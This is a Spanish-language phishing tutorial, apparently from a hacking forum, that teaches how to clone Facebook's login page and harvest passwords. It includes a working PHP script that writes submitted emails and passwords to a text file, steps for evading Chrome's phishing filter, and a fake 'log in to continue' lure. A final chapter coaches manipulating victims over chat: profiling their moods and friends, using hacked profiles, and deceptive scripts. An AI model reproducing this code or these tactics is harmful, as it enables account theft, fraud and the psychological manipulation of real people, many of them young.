CONTENIDO:
-Introducción………………………………………………...2
-Como hacer un fake de facebook……………………….3
-Indetectando un fake a chrome………………………….13
-Ponerle “inicia sesión para continuar” para que
Se vea más creíble…………….........................................22
-Ingeniería Social para usar los fakes …………………..27
Bueno sean bienvenidos a este primer pdf de ingeniería
social impartido por mi “elshotta”.
Bueno como ya saben para hacer ingeniería social
seria bueno saber algo de html, css, javascript, php,
Pero no es 100% necesario.
De todas formas para entender más y hacer sus fakes
mejor es bueno saber esos lenguajes, pero yo aca les
mostrare como Yo Empeze en este mundo sin saber de
ningúno de esos lenguajes.
Bueno empezemos ya sin nada más que decir :)
Bueno esto es un tema muy buscado en la red, todos
tuvimos que pasar por eso de andar buscando en
youtube, google, y al fin dando con los foros podemos
encontrar una mejor solución.
En el foro hay muchísimos post sobre esto de crear un
fake de facebook, Outlook, lo que sea.
Pero veo que a los user no les queda muy claro o se
estancan en alguna parte y no hacen nada, terminan
buscando fakes online.
Entonces en esta guía tratare de enseñarles a hacer un
fake de facebook de la manera que entiendan más fácil.
Vamos a la página de facebook a la que haremos el
fake. Yo para mi gusto prefiero esta para los fakes de
facebook más que la de inicio.
https://www.facebook.com/login.php?next=https%3A%2F%2Fw
ww.facebook.com%2Fmessages
Entonces le damos a click derecho -> ver código fuente
de la página
Entonces veremos esta página copiamos todo y
guardamos en nuestro editor de texto
(Bloc de notas, dreamweaver, etc.)
Yo usare mi bloc de notas++, y lo guardan con el
clásico nombre index.html.
Lo abrimos para ver que todo esté en orden para seguir
haciendo el fake.
Ok esta todo en orden ;), ahora vamos a darle a buscar
(en bloc de notas de Windows es ctrl+b, en bloc de
notas ++ es ctrl+f y en dreamweaver creo que es igual).
Y buscamos la palabra “method” sin comillas y
aparecerá esto
Y vemos que antes del method ahí un link
/login.php?login_attempt=1&next=https%3A%2F%2Fw
ww.facebook.com%2Fmessages
Lo borramos y ponemos login.php
Listo ya tenemos la mitad del fake ahora lo que yo hacia
cuando era muy novato para crear el login.php era buscar
por google o en un foro.
Como este que he puesto en Masters-Hackers y Most-
Security, pero como el curso viene siendo de M-H entonces
pondré una captura del post en M-H
Link: http://masters-hackers.info/showthread.php?t=27487
Entonces dice que debemos buscar el id y el name del
login y del pass, la forma más fácil es con el firefox
seleccionar la parte donde se ponen los datos como en el
siguiente pantallazo.
Luego darle clic derecho -> ver código fuente seleccionado
Y aparecerá esto.
Ok entonces seria asi el php robadatos.
------------------------------------------------------------------------------
<?php
$id-email=$_POST["name-email"];
$id-pass=$_POST["name-pass"];
$guardar=fopen("pass.txt",a);
fwrite($guardar,"
".$id-email."
".$id-pass);
fclose($guardar);
echo "<META HTTP-EQUIV='refresh' CONTENT='1;
url=http://www.facebook.com'>";
?>
-------------------------------------------------------------------------------
Ahora quiero que se imaginen como va quedando el fake
Me explico con esta imagen
Entonces vemos que en el campo de correo electrónico el
id y el name es “email”.
y ahora buscamos el del password
El id y el name son “pass”
Bien entonces crearemos nuestro login.php
Con el editor de texto
<?php
$email=$_POST["email"];
$pass=$_POST["pass"];
$guardar=fopen("pass.txt",a);
fwrite($guardar,"
".$email."
".$pass);
fclose($guardar);
echo "<META HTTP-EQUIV='refresh' CONTENT='1;
url=http://www.facebook.com'>";
?>
Bueno ahora solo falta subirlo al hosting
Eso si no lo explicare por acá porque se va a alargar
mucho el curso, busquen en el foro que hay tengo un tuto
sobre eso :p .
Host recomendados:
www.hostyd.com
www.hostimite.com
www.hostinger.com
Ahora nos encontramos con un Nuevo enemigo
Que es filtro de chrome con su alerta de phising
Pero tranquilos en el otro capítulo enseñare a saltar este
molesto filtro
En este capítulo enseñare a indetectar cualquier fake a
chrome en este caso seguiremos con el de facebook.
Bueno seguimos…
Lo que vamos a hacer es abrir el fake de facebook con el
editor de texto y vamos al final del documento y
empezaremos a borrar todo lo que no tenga que ver con el
fake
Borramos los script que no sirven para nada en nuestro
fake Y mientras vamos borrando, vamos actualizando el
fake (para evitar que los errores se impriman en la
pantalla).
Entonces borramos todos los <script></script>
Y ahora borraremos todos los href=”” />
Esto llevara un poco de tiempo :p ajajajaj
Ya cuando hayamos borrado todos los href=”” y los <script>
Del código fuente llegamos a el top del fake (inicio)
Entonces lo que hacemos acá es guardar los css y el icono
en nuestra PC, vamos al primer css
https://fbstatica.akamaihd.net/rsrc.php/v2/y3/r/X5oSa59Mm
zA.css
y damos clic derecho-> guardar como y lo guardamos junto
al index.html
Dejen el mismo nombre, así
Actualicen el index.html y vemos que desaparece el
Facebook blanco que aparece en la esquina izquierda
WTF, Es bueno que actualicen la pagina del fake de vez en
cuando para detectar estos errores mas rápido.
Ahora vamos a abrir el css ‘X5oSa59MmzA.css’
y pondremos en el navegador los url que terminen en png o
sea una imagen
Agregando al comienzo la pagina de facebook
https://fbstatic-a.akamaihd.net
Entonces quedaria así
Bueno van probando los url hasta llegar a la imagen del
fake que falta
https://fbstatic-a.akamaihd.net/rsrc.php/v2/yD/r/BE57I-
Gef_l.png
y guardamos la imagen en el mismo lugar donde este
el index.html y los css.
Y borramos toda la ruta de la imagen excepto el nombre de
espero me explique bien :p
Ahi señalo en rojo lo que tienen que borrar.
Cuando terminen de borrar guardan y actualizan la pagina
y vemos que la imagen de facebook que aparece en la
esquina a vuelto a reaparecer ;)
Bueno, guardamos todos los css (actualizando la pagina
para detectar errores)
Y nos debe de quedar así
Guarden el icono https://fbstatic-
a.akamaihd.net/rsrc.php/yl/r/H3nktOa7ZMg.ico
Pero cambien de nombre mejor
Entonces para los perdidos van a la pagina y dan en
guardar imagen (dándole clic en la imagen)
Y guardan luego borran la ruta en el index.html dejando
solo el nombre del icono,
Ahora borren esto
Le cambiamos el nombre a donde dice facebook
Y actualizamos la pagina
Veremos esto
Y ahora vamos al primer css que tiene el nombre de
UZlg6QD4e_0.css
y buscamos donde diga facebook
Y ponemos el mismo nombre que pusimos en el html, en mi
caso fue lol ustedes pongan cualquiera
Bueno ahora indetectaremos los css, como? Pues borrando
cosas que no tengan que ver con el fake sin afectarlo :p
Aunque para esto es recomendable saber sobre css así se
ahorraran mucho tiempo, entonces para hacerlo más rápido
vamos a borrar líneas de código css.
Y como ya he dicho antes ACTUALIZEN LA PAGINA
CADA VEZ QUE HAGAN CAMBIOS
Entonces empezaremos borrando la primera línea a ver
si No Al fake en el aspecto
Lo borramos y notamos que no cambio en el aspecto de la
página actualizándola
Borramos la siguiente línea
Que sería todo esto
Y actualizamos la pagina y vemos que si ocurre un cambio
El grosor de las letras donde dice “correo electrónico:”
Y “contraseña” a cambiado, denle crtl + z para que “regrese
la línea del código que No Debimos borrar”
Bueno entonces se tornaría muy largo si me pongo a
mostrar todo lo que pueden o no borrar, así que eso si se
los dejo a ustedes.
Esta es la parte que mas lleva tiempo porque tienen que
hacerlo línea por línea, pero estará indetectable al filtro de
chrome, como yo tengo mis fakes montados hace mucho
tiempo sin ser detectados por el filtro :D
Bueno sigamos con el próximo capítulo.
Bueno esto es facil a comparacion de todo lo que hemos
visto anteriormente :D asi que prosigamos :p
Bueno ya habia puesto esto en el foro, pero pues va otra
vez jaajajajajaj.
Vamos a facebook y vemos cualquier imagen graciosa de
esas que aparecen en las paginas donde publican memes
Ok ahora vamos a abrir otra pestaña con la pagina de
facebook http://www.facebook.com
Ahora cerramos en la pagina de facebook (la que no es la
de la foto del meme! )
Y entonces vamos a la pagina donde esta la foto y
esperamos a que salga el clasico “inicia secion para
continuar”
Y guardamos la pagina con cualquier nombre
Abrimos con el editor de texto
Buscamos el nombre del perfil que tenemos (aca es donde
la mayoria de users se confunden)
ahora vamos al final del documento y buscamos la parte que empieze con <div
class="uiContextualDialogPositioner uiLayer hidden_elem
uiContextualDialogLeft"
Y buscamos la parte del boton para ponerle la redireccion
al fake
y agregamos el evento onclick="location.href = 'Archivo a re
direccionar'
http://www.masters-hackers.info/showthread.php?t=38779
ahí tienen el post en M-H para que entiendan mejor
Ahora vamos al capítulo final y el más interesante que es el
de Trucos de ingeniería social para usar por chat
Bueno acá hemos llegado al tema más interesante de esta
rama del hacking que es el de la Ingeniería Social, ya
tenemos todos los materiales necesarios que son
*fake de facebook
*inicia sesión para continuar para que se vea mas creíble
*fake indetectable
Pero hace falta lo más importante que es el ¿Cómo
usarlos? Algunos de ustedes dirán
-eso es lo más fácil solo es enviarlo y ya está, tienen el
password de la víctima.
Pero pueden que tengan razón pero no todas las victimas
que van a tener son igual de ignorantes unas son mas
listas que otras y no todas caerán con los mismos trucos.
Bueno entonces la ingeniería social tiene algo de
psicología.
Bueno como nos enseñaron algúna vez en la escuela
la psicología es la ciencia que estudia al alma y del alma
viene la personalidad, el consciente y el inconsciente
no estoy pidiendo que estudien psicología para hacer
ingeniería social, pero es bueno saber cómo se comportan
las personas en estas épocas :P
Entonces para “hackear un facebook” se tiene que tomar
los siguientes pasos
1) Reconocimiento de cómo es tu victima
2) Mirando quien es de sus mejores amigos
3) Al momento de empezarle a hablar y ganar confianza
mirar en qué estado de ánimo se encuentra (tristeza,
furia, felicidad, etc.)
Bueno hagámonos la idea de que nos mandaron a hackear
este perfil de esta nena
Entonces vemos el paso uno que es Reconocimiento
Vemos que su perro murió hace un mes eso puede
decirnos que se encuentra deprimida lo que significa que
conocer a algún extraño (nosotros) no es lo que más quiere
hacer, tal vez hasta terminaría rechazándonos y
desconectándonos el chat y eso no nos serviría mucho :p
Es hincha de millonarios así que cuando empecemos a
ganar confianza decir algo como “de que equipo eres
hincha?”
Y ella dirá “obvio de millos” y tú dices “yo también nos
llevaremos muy bien (así no seas de millonarios ajajajaj)
Bueno muchas cosas que pueden sacar para recolectar
información, como ver que parece alguien social y
simpática eso nos hará las cosas más fácil :)
Bueno iremos al segundo punto Mirar sus mejores
amigos
Vemos las personas que etiqueta en sus fotos son
personas de confianza o buenos amigos
Obvio tu no etiquetarías en una foto a alguien que te caiga
mal.
Entonces se preguntan “para que esto? Para que quiero
ver a sus amigos, si lo que me interesa es su pass?”
Pues muy fácil, digamos que agregas a la victima pero
cuando vas a hablar con ella, vez que se nota muy distante
y no te habla o te evita, lo mejor que podrías hacer es
agregar a uno de sus mejores amigos, los que comenten
siempre sus estados en facebook o que siempre etiquete
en sus fotos, y robarles el pass a su mejor amigo y luego
robar el pass de la victima original ya que no desconfiaría
de que su mejor amigo quiera hacerle algo Tan malo que
es robarle la pass de su cuenta jaajajajaj.
Bueno en el punto tres Mirar estado de ánimo de la
victima
Pondré algunos ejemplos escritos porque no tengo
agregada a la victima ajajja
Ok para mi gusto prefiero usar perfiles falsos o hacked para
hacer mis ataques de ingeniería social.
de un Hombre y otro de una Mujer, ambos jóvenes porque
siempre que me buscan para hackear facebook son
jóvenes entre 16 a 25 años.
Entonces tenia que “hackear a un hombre” entonces use el
perfil de la mujer, lo agregue cuando me acepto, espere a
que estuviera conectado y empecé con la conversación
marcare lo que yo digo con y lo que dice la víctima con
rojo
-Hola -hola -como estas? -Venga quien es usted la conozco o me distingue o que es lo que quiere Que podemos observar aquí? “bueno vemos que la victima esta con mal humor o siempre se porta así con los desconocidos entonces ganar su confianza se nos dificultara mas” Otro ejemplo muy molesto es este
-Hola -Hola -como estas? -bien y tu? -bien bien, oye me regalas un like a esta foto (link del fake ) -ok ;) - (dos minutos después) oye ya le diste like, no me llego nada :’( -like a qué? - a la foto que te mande (enviamos de nuevo el fake) -no me abre nada -mmmm de verdad pero ya varios amigos me han dado like -mmm no se Esto en realidad es muy molesto que la víctima no se sabe en que mundo esta o tal vez se dio cuenta de que la están intentando hackear (pero normalmente te mandan a la mierda jajajajajaaj), o tal vez tiene miedo de abrir el link porque piensa que es algún virus o no se sabe, pero no abre el link porque eres un desconocido que le está enviando un link. Bueno estos son los más vistos :p (de los que no caen).
Existen tres métodos para hacer ingeniería social que he descubierto con el tiempo y se los explicare :D
Método Seco: Este método es uno de los métodos más usados para hacer ingeniería social por chat, pero no es el más recomendable, ejemplo. ------------------------------------------------------------------------------ -Hola -Hola -oye regálame un like a esta foto (enviamos fake) -ok -ya le di like ;) -gracias ------------------------------------------------------------------------------- O también esta de esta forma
-Hola
- -oye esta eres tu o alguien creo un perfil y pone tus fotos (link del fake, esto es para llamar su atención) -si esa foto es mia ------------------------------------------------------------------------------- Entonces vemos que el método seco se trata de enviarle el fake sin tener confianza ni nada, este método funciona 45% de las veces.
Método de esperar a que haya confianza total: Este método es el más demorado pero es el más efectivo de todos, porque tienes que hablar demasiado con la víctima y ganar su confianza como harías con una amiga o amigo de verdad, la confianza se gana después de dos días pero si lo que no tienes es tiempo para todo eso acá viene el otro método.
Método de confundir a la víctima: Este método es el que más uso yo, se trata de cómo dice “confundir a la víctima” vean el ejemplo -Hola -Hola -Como estas? -bien y tu? -Bien Bien -oye cuando nos vamos a volver a ver -te conozco??? -ushh no te acuerdas de mi? -no o.O -no te acuerdas que estábamos en el parque que dia con tus amigos y que yo llege ahí y empezamos a hablar? - o.O no no me acuerdo, -dime cual parque? Quienes estaban? (aca ya debimos haber recolectado información de lugar donde vive la víctima y sus amigos) -en el parque que queda atrás del éxito -mmmm no me acuerdo la verdad, dime cual amigo -mira fue este, el me dio tu facebook (enviamos fake) -no me aparece nada (ponemos que el fake re direccione a una página de facebook que dice “no se pudo encontrar la pagina”) -mmmm tal vez es porque el me dijo que iba a desactivar la cuenta porque tuvo problemas con la novia
-mmmm ok -pero yo te lo envió cuando la active de nuevo -ok (Miramos las contraseñas capturadas y ahí debe de estar su pass :D) Bueno ya hasta acá termina el pdf del curso de ingeniería social impartido por mi Elshotta
Fin